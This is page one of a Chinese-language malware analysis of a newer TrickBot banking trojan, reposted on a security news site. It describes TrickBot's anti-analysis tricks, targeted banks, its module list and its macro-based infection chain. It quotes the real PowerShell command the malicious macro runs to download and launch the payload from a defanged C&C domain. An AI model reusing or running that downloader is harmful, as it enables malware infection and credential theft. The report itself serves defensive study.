欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

TrickBot银行木马最新版本分析报告

来源:本站整理 作者:佚名 时间:2018-12-11 TAG: 我要投稿

一、概述
TrickBot是一款专门针对银行发动攻击的木马程序,攻击目标除了包括300余家知名国际银行外,还包括binance.com等多家虚拟货币交易平台。
TrickBot木马最早被发现于2016年,其很多功能与另外一款针对银行的木马Dyreza非常相似。TrickBot木马的早期版本,没有任何字符串加密功能,也基本没有采用其他的对抗手段,但目前流行TrickBot使用了很强的加密功能,也使用用多种安全对抗技术,使得安全人员对其进行代码分析越来越困难。
我们总结了最新版本的TrickBot如下特点:
1.高强度的反分析能力:
1)木马所用到的字符串全部采用自定义base64编码进行加。
2)代码进行了大量混淆对抗静态分析。
3)对抗动态调试。
4)对抗沙盒检测。
5)对抗dump分析。
6)运用了大量加密手段,对抗杀软查杀。
2.强大的窃取能力
TrickBot入侵用户电脑后,会下载多个恶意模块到本地执行,收集信息,盗取金融的账户信息等等,涉及金融站点链接多达300多个,下表为受影响的小部分银行名称,详细受影响银行列表见文末附录。
公司名称
域名
苏格兰皇家银行
https://www.rbsidigital.com
汇丰银行
https://www.business.hsbc.co.uk
苏格兰银行
https://banking.bankofscotland.co.uk
西敏寺银行
https://www.natwestibanking.com
德意志银行
https://www.deutschebank-dbdirect.com
巴克莱银行
https://www.barclayswealth.com
3.广泛的信息收集能力
TrickBot除盗窃金融账户信息外,还会盗窃浏览器、FTP、SSH等用户凭据,收集用户隐私,收集环境信息,收集特定类型服务器信息,收集邮箱等等。
4、复杂的模块集合
TrickBot采用模块化设计,扩展性极强,攻击者可随时通过网络下发替换不同恶意模块,替换配置进行不同种类的恶意攻击。截止到目前,一共有12个模块,TrickBot频繁更新用于传播的Loader,其伪装成一些游戏或工具,通过更换Loader编写语言以及编译器,对抗杀软查杀。同时新增了POS信息收集模块以及更新了新版本凭据盗窃模块。以下是TrickBot的恶意模块列表。
病毒模块列表:
模块
目的
injectDll
执行Web浏览器注入窃取金融账户信息
importDll
收集浏览器敏感数据
mailsearcher
搜索文件系统收集邮箱信息
networkDll
收集网络和系统信息
pwgrab
收集浏览器、SSH、FTP等用户凭据
shareDll
更新loader并通过SMB传播TrickBot
tabDll
通过EternalRomance漏洞传播TrickBot
systeminfo
收集系统信息
wormDll
查询域控制器及共享
psfin
收集POS服务器信息
bcClientDllTestTest
将被感染计算器作为代理服务器使用
NewBCtestnDll
带有命令执行功能的反弹SHELL
5.支持横向攻击及多重持久化方式
TrickBot部署模块中包含“永恒浪漫”利用,向默认共享中复制最新版本的TrickBot伪装载体,多种途径尝试进行横向攻击传播。TrickBot会通过计划任务启动,其模块拥有添加注册表、服务、启动目录等启动的能力。
 
二、详细分析
本次获取的“TrickBot”样本通过带有宏的Excel表格文件进行传播,并以附件的形式发给用户。用户打开文档执行宏,文档内的恶意代码将会执行,通过调用CMD、POWERSHELL,下载并启动病毒。
主体分析


载荷分析

文档中的宏被执行后,会在%temp%下创建tmp409.bat,通过批处理执行powershell从C&C服务器(hxxp://hsbcdocuments.net)下载病毒。

powershell "function tryload([string] $str1){(new-object system.net.webclient).downloadfile($str1,'C:\Users\currentuser\AppData\Local\Temp\newfile.exe');start-process 'C:\Users\currentuser\AppData\Local\Temp\newfile.exe';}try{tryload('hxxp://hsbcdocuments.net/twi.light')}catch{tryload('hxxp://hsbcdocuments.net/twi.light')}
powershell执行后会将病毒下载到”%temp%\newfile.exe”并启动。
伪装层分析
为了对抗安全软件查杀、沙箱检测和安全人员分析,病毒被多层loader包裹,代码进行了大量混淆。字符串及核心代码全部加密,运行时解密,执行后再加密。
伪装层掺杂了大量的无用代码,其核心功能是将自身携带的loader解密进行内存加载。

将自身资源中加密存储的Loader解密后拷贝到堆空间中,然后转入Loader入口执行。

Loader分析
流程转到该Loader层后,病毒在执行过程中会按需解密,解密执行完成后再将代码加密。循环往复,增加动态调试和静态分析的难度,如下图所示为病毒待解密的数据指针表。

[1] [2] [3] [4] [5] [6] [7] [8]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载